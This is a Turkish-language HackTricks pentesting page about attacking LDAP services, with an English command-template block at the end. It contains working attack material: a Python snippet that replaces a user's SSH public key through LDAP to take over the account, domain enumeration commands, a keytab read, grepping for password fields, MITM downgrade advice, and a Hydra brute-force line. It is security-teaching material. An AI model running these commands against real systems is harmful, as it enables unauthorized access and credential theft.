Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
Hacking püf noktalarınızı paylaşarak PR'lar göndererekHackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
LDAP (Hafif Dizin Erişim Protokolü) kullanımı, genellikle ağlarda, hem genel hem de özel, kuruluşları, bireyleri ve dosyaları ve cihazları gibi çeşitli varlıkları bulmak için yapılmaktadır. DAP'nin yerine daha küçük bir kod ayak izine sahip olmasıyla, daha akışkan bir yaklaşım sunar.
LDAP dizinleri, her birinin dizinin çoğaltılmış ve senkronize edilmiş bir sürümünü barındıran birkaç sunucu üzerine dağıtılmasına izin vermek üzere yapılandırılmıştır, bu sunuculara Dizin Sistemi Ajanı (DSA) denir. İstekleri işleme sorumluluğu tamamen LDAP sunucusuna aittir ve gerektiğinde diğer DSAlarla iletişim kurarak istek sahibine birleşik bir yanıt sunabilir.
LDAP dizininin organizasyonu, kök dizinden başlayarak ağaç hiyerarşisine benzer. Bu, ülkelerden başlayarak, daha sonra organizasyonlara ve ardından farklı bölümleri veya departmanları temsil eden organizasyon birimlerine ve son olarak insanlar ve dosyalar gibi paylaşılan kaynakları içeren bireysel varlık seviyesine ulaşır.
Varsayılan port: 389 ve 636 (ldaps). Global Catalog (ActiveDirectory'de LDAP) varsayılan olarak 3268 ve LDAPS için 3269 portlarında bulunmaktadır.
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
LDAP Veri Değişim Formatı
LDIF (LDAP Veri Değişim Formatı), dizin içeriğini bir dizi kayıt olarak tanımlar. Ayrıca güncelleme isteklerini (Ekle, Değiştir, Sil, Yeniden Adlandır) temsil edebilir.
Satırlar 1-3, üst düzey etki alanını local olarak tanımlar
Satırlar 5-8, ilk düzey etki alanını moneycorp (moneycorp.local) olarak tanımlar
Satırlar 10-16, 2 organizasyon birimini tanımlar: dev ve sales
Satırlar 18-26, etki alanı nesnesini oluşturur ve değerlerle öznitelikler atar
Veri Yazma
Değerleri değiştirebiliyorsanız gerçekten ilginç eylemler gerçekleştirebilirsiniz. Örneğin, kullanıcıların "sshPublicKey" bilgisini değiştirebileceğinizi hayal edin. Bu öznitelik varsa, ssh'nin genel anahtarları LDAP'den okuduğu muhtemeldir. Bir kullanıcının genel anahtarını değiştirebiliyorsanız, ssh'de parola kimlik doğrulaması etkin değilse bile o kullanıcı olarak giriş yapabileceksiniz.
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/>>> importldap3>>> server=ldap3.Server('x.x.x.x',port=636,use_ssl=True)>>> connection=ldap3.Connection(server,'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN','PASSWORD',auto_bind=True)>>> connection.bind()True>>> connection.extend.standard.who_am_i()u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
Açık metin kimlik bilgilerini izleme
Eğer LDAP SSL olmadan kullanılıyorsa, ağda açık metin kimlik bilgilerini izleyebilirsiniz.
Ayrıca, ağda LDAP sunucusu ile istemci arasında bir MITM saldırısı gerçekleştirebilirsiniz. Burada, istemcinin açık metin kimlik bilgilerini kullanarak giriş yapmasını sağlayacak bir Downgrade Saldırısı yapabilirsiniz.
Eğer SSL kullanılıyorsa, yukarıda bahsedildiği gibi bir MITM yapmaya çalışabilirsiniz ancak sahte bir sertifika sunarak, eğer kullanıcı kabul ederse, kimlik doğrulama yöntemini Downgrade edebilir ve kimlik bilgilerini tekrar görebilirsiniz.
Anonim Erişim
TLS SNI kontrolünü atlatma
Bu yazıda belirtildiğine göre, LDAP sunucusuna rastgele bir alan adıyla (örneğin company.com) erişerek, anonim bir kullanıcı olarak bilgi çıkartabildi.
LDAP anonim bağlantıları, kimlik doğrulaması yapılmamış saldırganlara alan adından bilgi almayı sağlar, böylece kullanıcıların, grupların, bilgisayarların, kullanıcı hesabı özniteliklerinin ve alan parola politikasının tam listesini alabilirler. Bu, eski bir yapılandırmadır ve Windows Server 2003'ten itibaren yalnızca kimlik doğrulaması yapılmış kullanıcılara LDAP istekleri başlatma izni verilir.
Ancak, yöneticiler anonim bağlantılara izin vermek için belirli bir uygulama kurmak zorunda kalmış olabilir ve istenenden fazla erişim vererek kimlik doğrulaması yapılmamış kullanıcılara AD'deki tüm nesnelere erişim sağlamış olabilirler.
Geçerli Kimlik Bilgileri
Eğer LDAP sunucusuna giriş yapmak için geçerli kimlik bilgileriniz varsa, Alan Yöneticisi hakkında tüm bilgileri dökümleyebilirsiniz:
Windapsearch, LDAP sorgularını kullanarak bir Windows etki alanından kullanıcıları, grupları ve bilgisayarları sıralamak için yararlı bir Python betiğidir.
# Get computerspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--computers# Get groupspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--groups# Get userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Domain Adminspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Privileged Userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--privileged-users
ldapsearch
Boş kimlik bilgilerini kontrol edin veya kimlik bilgilerinizin geçerli olup olmadığını kontrol edin:
# CREDENTIALS NOT VALID RESPONSEsearch:2result:1Operationserrortext:000004DC:LdapErr:DSID-0C090A4C,comment:Inordertoperformthisoperationasuccessfulbindmustbecompletedontheconnection.,data0,v3839
Eğer "bağlantı tamamlanmalıdır" şeklinde bir şey bulursanız, bu kimlik bilgilerinin yanlış olduğu anlamına gelir.
Eğer herhangi bir şifreye erişiminizin olup olmadığını görmek istiyorsanız, sorgulardan birini çalıştırdıktan sonra grep kullanabilirsiniz:
<ldapsearchcmd...>|grep-i-A2-B2"userpas"
pbis
pbis'i buradan indirebilirsiniz: https://github.com/BeyondTrust/pbis-open/ ve genellikle /opt/pbis dizinine kurulur.
Pbis, temel bilgilere kolayca erişmenizi sağlar:
#Read keytab file./klist-k/etc/krb5.keytab#Get known domains info./get-status./lsaget-status#Get basic metrics./get-metrics./lsaget-metrics#Get users./enum-users./lsaenum-users#Get groups./enum-groups./lsaenum-groups#Get all kind of objects./enum-objects./lsaenum-objects#Get groups of a user./list-groups-for-user<username>./lsalist-groups-for-user<username>#Get groups of each user./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group./enum-members--by-name"domain admins"./lsaenum-members--by-name"domain admins"#Get users of each group./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user./adtool-asearch-user--nameCN="*"--keytab=/etc/krb5.keytab-n<Username>|grep"CN"|whilereadline; doecho"$line";./adtool--keytab=/etc/krb5.keytab-n<username>-alookup-object--dn="$line"--attr"description";echo"======================"done
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
https://book.hacktricks.xyz/pentesting/pentesting-ldap
Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f